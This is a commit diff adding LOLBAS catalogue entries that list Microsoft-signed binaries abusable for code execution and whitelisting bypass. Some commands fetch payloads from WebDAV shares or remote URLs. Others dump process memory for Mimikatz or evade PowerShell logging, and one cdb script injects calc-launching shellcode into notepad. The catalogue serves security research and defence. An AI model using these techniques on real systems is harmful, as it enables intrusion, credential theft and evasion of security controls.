Initial commit - LOLBAS V2.0

OtherMSBinaries/Appvlp.yml

@@ -0,0 +1,22 @@
+---
+Name: Appvlp.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: AppVLP.exe \\webdav\calc.bat
+    Description: Executes calc.bat through AppVLP.exe
+  - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
+    Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
+  - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
+    Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
+Full Path:
+  - C:\Program Files\Microsoft Office\root\client\appvlp.exe
+  - C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://github.com/MoooKitty/Code-Execution
+  - https://twitter.com/moo_hax/status/892388990686347264
+Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)

OtherMSBinaries/Bginfo.yml

@@ -0,0 +1,20 @@
+---
+Name: Bginfo.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
+    Description: Execute VBscript code that is referenced within the bginfo.bgi file.
+  - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
+    Description: Execute bginfo.exe from a WebDAV server.
+  - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
+    Description: This style of execution may not longer work due to patch.
+Full Path:
+  - No fixed path
+Code Sample: []
+Detection: []
+Resources:
+  - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
+Notes: Thanks to Oddvar Moe - @oddvarmoe

OtherMSBinaries/Cdb.yml

@@ -0,0 +1,19 @@
+---
+Name: Cdb.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: cdb.exe -cf x64_calc.wds -o notepad.exe
+    Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
+Full Path:
+  - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
+  - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
+Code Sample: []
+Detection: []
+Resources:
+  - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
+  - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
+  - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
+Notes: Thanks to Matt Graeber - @mattifestation

OtherMSBinaries/Csi.yml

@@ -0,0 +1,18 @@
+---
+Name: csi.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: csi.exe file
+    Description: Use csi.exe to run unsigned C# code.
+Full Path:
+  - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
+  - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/subTee/status/781208810723549188
+  - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
+Notes: Thanks to Casey Smith - @subtee

OtherMSBinaries/Dnx.yml

@@ -0,0 +1,17 @@
+---
+Name: dnx.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: dnx.exe consoleapp
+    Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
+Full Path:
+  - N/A
+Code Sample: []
+Detection: []
+Resources:
+  - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
+Notes: Thanks to Matt Nelson - @enigma0x3
+

OtherMSBinaries/Dxcap.yml

@@ -0,0 +1,17 @@
+---
+Name: Dxcap.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
+    Description: Launch notepad as a subprocess of Dxcap.exe
+Full Path:
+  - c:\Windows\System32\dxcap.exe
+  - c:\Windows\SysWOW64\dxcap.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/harr0ey/status/992008180904419328
+Notes: Thanks to Matt harr0ey - @harr0ey

OtherMSBinaries/Mftrace.yml

@@ -0,0 +1,21 @@
+---
+Name: Mftrace.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Mftrace.exe cmd.exe
+    Description: Launch cmd.exe as a subprocess of Mftrace.exe.
+  - Command: Mftrace.exe powershell.exe
+    Description: Launch cmd.exe as a subprocess of Mftrace.exe.
+Full Path:
+  - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
+  - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
+  - C:\Program Files (x86)\Windows Kits\10\bin\x86
+  - C:\Program Files (x86)\Windows Kits\10\bin\x64
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
+Notes: Thanks to fabrizio - @0rbz_

OtherMSBinaries/Msdeploy.yml

@@ -0,0 +1,16 @@
+---
+Name: Msdeploy.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
+    Description: Launch calc.bat via msdeploy.exe.
+Full Path:
+  - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/995837734379032576
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

OtherMSBinaries/Msxsl.yml

@@ -0,0 +1,19 @@
+---
+Name: msxsl.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: msxsl.exe customers.xml script.xsl
+    Description: Run COM Scriptlet code within the script.xsl file (local).
+  - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
+    Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
+Full Path:
+  - N/A
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/subTee/status/877616321747271680
+  - https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
+Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)

OtherMSBinaries/Payload/Cdb_calc.wds

@@ -0,0 +1,93 @@
+$$ Save this to a file - e.g. x64_calc.wds
+$$ Example: launch this shellcode in a host notepad.exe process.
+$$ cdb.exe -cf x64_calc.wds -o notepad.exe
+
+$$ Allocate 272 bytes for the shellcode buffer
+$$ Save the address of the resulting RWX in the pseudo $t0 register
+.foreach /pS 5  ( register { .dvalloc 272 } ) { r @$t0 = register }
+
+$$ Copy each individual shellcode byte to the allocated RWX buffer
+$$ Note: The `eq` command could be used to save space, if desired.
+$$ Note: .readmem can be used to read a shellcode buffer too but
+$$   shellcode on disk will be subject to AV scanning.
+;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4
+;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00
+;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51
+;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51
+;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2
+;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52
+;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52
+;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52
+;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72
+;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7
+;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31
+;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0
+;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C
+;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41
+;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41
+;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED
+;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48
+;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B
+;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01
+;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88
+;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48
+;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67
+;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50
+;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44
+;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49
+;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56
+;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41
+;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48
+;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31
+;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0
+;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9
+;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1
+;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1
+;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24
+;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1
+;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44
+;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49
+;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41
+;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44
+;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49
+;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B
+;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01
+;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41
+;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A
+;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59
+;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83
+;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52
+;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41
+;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B
+;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF
+;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48
+;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00
+;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00
+;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D
+;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00
+;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B
+;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5
+;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A
+;eb @$t0+E8 0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6
+;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF
+;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4
+;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C
+;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0
+;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47
+;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A
+;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89
+;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63
+;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00
+
+$$ Redirect execution to the shellcode buffer
+r @$ip=@$t0
+
+$$ Continue program execution - i.e. execute the shellcode
+g
+
+$$ Continue program execution after hitting a breakpoint
+$$ upon starting calc.exe. This is specific to this shellcode.
+g
+
+$$ quit cdb.exe
+q

OtherMSBinaries/Rcsi.yml

@@ -0,0 +1,15 @@
+---
+Name: rcsi.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rcsi.exe bypass.csx
+    Description: Use embedded C# within the csx script to execute the code.
+Full Path: ''
+Code Sample: []
+Detection: []
+Resources:
+  - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
+Notes: Thanks to Matt Nelson - @enigma0x3

OtherMSBinaries/Sqldumper.yml

@@ -0,0 +1,21 @@
+---
+Name: Sqldumper.exe
+Description: Dump process
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: sqldumper.exe 464 0 0x0110
+    Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
+  - Command: sqldumper.exe 540 0 0x01100:40
+    Description: 0x01100:40 flag will create a Mimikatz compatibile dump file.
+Full Path:
+  - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+  - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/countuponsec/status/910969424215232518
+  - https://twitter.com/countuponsec/status/910977826853068800
+  - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
+Notes: Thanks to Luis Rocha - @countuponsec

OtherMSBinaries/Sqlps.yml

@@ -0,0 +1,16 @@
+---
+Name: Sqlps.exe
+Description: Execute, evade logging
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Sqlps.exe -noprofile
+    Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
+Full Path:
+  - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/bryon_/status/975835709587075072
+Notes: Thanks to Bryon - @bryon_

OtherMSBinaries/Sqltoolsps.yml

@@ -0,0 +1,16 @@
+---
+Name: SQLToolsPS.exe
+Description: Execute, evade logging
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
+    Description: Run PowerShell scripts and commands.
+Full Path:
+  - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/993298228840992768
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

OtherMSBinaries/Te.yml

@@ -0,0 +1,15 @@
+---
+Name: te.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: te.exe bypass.wsc
+    Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
+Full Path: ''
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
+Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s

OtherMSBinaries/Tracker.yml

@@ -0,0 +1,17 @@
+---
+Name: Tracker.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
+    Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
+Full Path: ''
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/subTee/status/793151392185589760
+  - https://attack.mitre.org/wiki/Execution
+
+Notes: Thanks to Casey Smith - @subTee

OtherMSBinaries/Vsjitdebugger.yml

@@ -0,0 +1,16 @@
+---
+Name: vsjitdebugger.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Vsjitdebugger.exe calc.exe
+    Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
+Full Path:
+  - c:\windows\system32\vsjitdebugger.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/990758590020452353
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

OtherMSBinaries/Winword.yml

@@ -0,0 +1,17 @@
+---
+Name: winword.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: winword.exe /l dllfile.dll
+    Description: Launch DLL payload.
+Full Path:
+  - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/vysecurity/status/884755482707210241
+  - https://twitter.com/Hexacorn/status/885258886428725250
+Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals)